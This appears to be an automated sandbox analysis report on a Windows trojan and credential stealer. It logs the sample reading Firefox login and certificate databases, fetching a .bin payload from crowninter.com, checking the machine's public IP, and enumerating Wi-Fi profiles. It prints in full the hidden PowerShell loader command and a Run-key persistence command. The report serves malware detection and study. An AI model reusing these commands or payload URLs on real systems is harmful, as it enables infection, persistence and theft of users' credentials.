Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cert9.db
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\logins.json

Yara detected Credential Stealer

Source: Yara match

File source: 00000012.00000002.2217463796.0000000024FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected PXRECVOWEIWOEI Stealer

Source: Yara match	File source: 00000012.00000002.2217463796.000000002526E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2217463796.0000000025265000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Screenshots

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
174.142.247.185	crowninter.com	Canada	32613	IWEB-ASCA	false
23.221.242.90	unknown	United States	8612	TISCALI-IT	false
104.16.185.241	icanhazip.com	United States	13335	CLOUDFLARENETUS	false
104.21.71.78	whatismyipaddressnow.co	United States	13335	CLOUDFLARENETUS	false

Private

IP
127.0.0.1

Contacted Domains

Name	IP	Active
whatismyipaddressnow.co	104.21.71.78	true
crowninter.com	174.142.247.185	true
ip-api.com	208.95.112.1	true
icanhazip.com	104.16.185.241	true
169.241.9.0.in-addr.arpa	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://crowninter.com/jAscfKcoNcxeCpbJ57.bin	false	Avira URL Cloud: safe	unknown
http://icanhazip.com/	false		high
http://ip-api.com/line/?fields=hosting	false		high

Uses 32bit PE files

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 104.21.71.78:443 -> 192.168.2.16:49705 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.71.78:443 -> 192.168.2.16:49709 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 104.21.71.78:443 -> 192.168.2.16:49711 version: TLS 1.2

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Pitapats\gimmickry\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Pitapats\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Curan158\

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

May check the online IP address of the machine

Source: unknown	DNS query: name: whatismyipaddressnow.co
Source: unknown	DNS query: name: whatismyipaddressnow.co
Source: unknown	DNS query: name: icanhazip.com
Source: unknown	DNS query: name: icanhazip.com
Source: unknown	DNS query: name: ip-api.com

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /jAscfKcoNcxeCpbJ57.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: crowninter.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /jAscfKcoNcxeCpbJ57.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: crowninter.comCache-Control: no-cache

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 104.21.71.78:443 -> 192.168.2.16:49705 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.71.78:443 -> 192.168.2.16:49709 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /jAscfKcoNcxeCpbJ57.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: crowninter.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jAscfKcoNcxeCpbJ57.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: crowninter.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: crowninter.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705

Source: unknown

HTTPS traffic detected: 104.21.71.78:443 -> 192.168.2.16:49711 version: TLS 1.2

Creates a window with clipboard capturing capabilities

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Window created: window name: CLIPBRDWNDCLASS

Creates files inside the system directory

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Uses 32bit PE files

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Uses reg.exe to modify the Windows registry

Source: C:\Windows\SysWOW64\cmd.exe

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@54/21@5/39

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Roaming\Pitapats

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_03
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6736:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2756:120:WilError_03
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Mutant created: \Sessions\1\BaseNamedObjects\651689
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5528:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\nsvF7C9.tmp

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)"
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: riched20.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: usp10.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: msls31.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: riched20.dll
